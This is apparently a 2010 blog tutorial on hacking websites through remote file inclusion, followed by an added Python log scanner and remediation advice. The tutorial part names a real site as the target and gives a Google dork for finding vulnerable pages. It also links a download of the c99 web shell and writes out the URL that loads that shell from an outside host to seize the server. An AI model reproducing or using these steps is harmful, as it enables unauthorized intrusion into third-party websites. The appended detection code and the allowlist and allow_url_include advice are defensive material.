Saturday, September 4, 2010

Hack a Website Using Remote File Inclusion


Remote file inclusion is one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker or attacker to include a remote file on the web server. If the attack succeeds, the attacker gains access to the web server and can therefore execute any command on it.

 
 
Searching for the Vulnerability
Remote file inclusion vulnerabilities usually occur in sites whose navigation looks similar to the one below:
www.Targetsite.com/index.php?page=Anything
To find the vulnerability, the hacker will most commonly use the following Google dork:
“inurl:index.php?page=”
This will show all the pages that have “index.php?page=” in their URL. To test whether the website is vulnerable to remote file inclusion or not, the hacker uses the following command:
www.targetsite.com/index.php?page=www.google.com
Let's say that the target website is http://www.cbspk.com
So the hacker's URL will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If the Google homepage shows up after executing the command, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage shows up, indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Let's say that the URL of the shell is
http://h1.ripway.com/rafaybaloch/c99.txt
The hacker would then execute the following command to gain access:
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Don't forget to say thanks...
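The requests described above leave a clear trace in web server logs. The following is an added example, not code from the original post: it scans combined-format access log lines for query parameters whose decoded value is a remote URL. The log entries, hostnames and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A page-selector parameter should never start with a URL scheme or "//".
REMOTE_RE = re.compile(r'^(?:(?:https?|ftps?|php|data|expect):|//)', re.I)

# Constructed sample entries (documentation IPs and hostnames, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2010:10:01:02 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.23 - - [04/Sep/2010:10:01:09 +0000] '
    '"GET /index.php?page=http://h.example.net/p.txt? HTTP/1.1" 200 48211',
    '198.51.100.23 - - [04/Sep/2010:10:01:15 +0000] '
    '"GET /index.php?page=%2568ttp%253A%252F%252Fh.example.net%252Fp.txt HTTP/1.1" 200 48211',
]

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so a double-encoded scheme is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()

def suspicious_params(target):
    """Return (name, value) pairs in the query string whose value is a remote URL."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)  # parse_qsl has already decoded one layer
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Return (client_ip, param, value) for every request carrying a remote URL."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a parsable request line
        for name, value in suspicious_params(match.group("target")):
            findings.append((line.split()[0], name, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection complements the fix rather than replacing it: the application should choose the included page from a fixed allowlist of local files, and PHP's allow_url_include setting should stay disabled. Applications that legitimately accept URLs in other parameters will need the check limited to the page-selector parameter.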

